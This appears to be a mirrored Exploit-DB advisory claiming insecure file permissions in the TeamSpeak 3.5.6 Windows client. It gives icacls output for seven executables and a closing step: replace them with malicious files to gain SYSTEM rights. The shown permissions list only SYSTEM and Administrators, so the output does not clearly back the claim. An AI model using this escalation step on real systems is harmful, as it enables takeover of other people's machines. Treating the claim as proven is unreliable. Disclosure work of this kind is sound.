TeamSpeak 3.5.6 – Insecure File Permissions

• Exploit Database
• 16 阅读

• 作者： Aryan Chehreghani
  日期： 2022-02-16
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/50743/

• # Exploit Title: TeamSpeak 3.5.6 - Insecure File Permissions
  # Date: 2022-02-15
  # Exploit Author: Aryan Chehreghani
  # Contact: aryanchehreghani@yahoo.com
  # Vendor Homepage: https://www.teamspeak.com
  # Software Link: https://www.teamspeak.com/en/downloads
  # Version: 3.5.6 
  # Tested on: Windows 10 x64
  
  # [ About - TeamSpeak ]:
  #TeamSpeak (TS) is a proprietary voice-over-Internet Protocol (VoIP),
  #application for audio communication between users on a chat channel,
  #much like a telephone conference call, Users typically use headphones with a microphone,
  #The client software connects to a TeamSpeak server of the user's choice from which the user may join chat channels,
  #The target audience for TeamSpeak is gamers, who can use the software to communicate,
  #with other players on the same team of a multiplayer video game,
  #Communicating by voice gives a competitive advantage by enabling players to keep their hands on the controls.
  
  # [ Description ]:
  #The TeamSpeak Application was installed with insecure file permissions.
  #It was found that all folder and file permissions were incorrectly configured during installation.
  #It was possible to replace the service binary. 
  
  # [ POC ]:
  
  C:\Users\user\AppData\Local\TeamSpeak 3 Client>icacls *.exe
  
  createfileassoc.exe NT AUTHORITY\SYSTEM:(F)
  BUILTIN\Administrators:(F)
  WIN-FREMP1UB3LB\Administrator:(F)
  
  error_report.exe NT AUTHORITY\SYSTEM:(F)
   BUILTIN\Administrators:(F)
   WIN-FREMP1UB3LB\Administrator:(F)
  
  package_inst.exe NT AUTHORITY\SYSTEM:(F)
   BUILTIN\Administrators:(F)
   WIN-FREMP1UB3LB\Administrator:(F)
  
  QtWebEngineProcess.exe NT AUTHORITY\SYSTEM:(F)
   BUILTIN\Administrators:(F)
   WIN-FREMP1UB3LB\Administrator:(F)
  
  ts3client_win32.exe NT AUTHORITY\SYSTEM:(F)
  BUILTIN\Administrators:(F)
  WIN-FREMP1UB3LB\Administrator:(F)
  
  Uninstall.exe NT AUTHORITY\SYSTEM:(F)
  BUILTIN\Administrators:(F)
  WIN-FREMP1UB3LB\Administrator:(F)
  
  update.exe NT AUTHORITY\SYSTEM:(F)
   BUILTIN\Administrators:(F)
   WIN-FREMP1UB3LB\Administrator:(F)
  
  Successfully processed 7 files; Failed processing 0 files
  
  # [ Exploit - Privilege Escalation ]:
  #Replace ts3client_win32.exe,update.exe,package_inst.exe,QtWebEngineProcess.exe,createfileassoc.exe and other ...
  #with any executable malicious file you want then wait and get SYSTEM or Administrator rights (Privilege Escalation)